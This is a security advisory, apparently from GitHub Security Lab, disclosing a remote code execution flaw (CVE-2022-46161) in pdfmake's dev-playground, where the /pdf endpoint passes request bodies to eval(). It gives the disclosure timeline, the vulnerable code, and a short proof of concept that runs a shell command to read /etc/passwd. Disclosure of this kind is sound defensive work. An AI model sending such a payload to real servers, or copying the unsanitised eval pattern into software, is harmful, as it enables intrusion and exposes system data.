Coordinated Disclosure Timeline
- 2022-08-23: Report sent to liborm85 at gmail.com
- 2022-10-10: Issue opened asking for a security contact
- 2022-11-21: Deadline expired so publishing in accordance to the GitHub Security Lab disclosure policy
Summary
The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).
Product
pdfmake
Tested Version
0.2.5
Details
Issue: RCE in dev-playground.js (GHSL-2022-068)
The /pdf endpoint in charge of creating a PDF from a given JS code does not sanitize user-input, nor does the execution take place in a sandboxed environment.
app.post('/pdf', function (req, res) {
eval(req.body.content);
Impact
This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.
Resources
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
- CWE-400: Uncontrolled Resource Consumption
POC
Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF doc:
const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
content: [
out.toString()
]
}
CVE
- CVE-2022-46161
Credit
This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).
Contact
You can contact the GHSL team at [email protected], please include a reference to GHSL-2022-068 in any communication regarding this issue.
还没有评论,来说两句吧...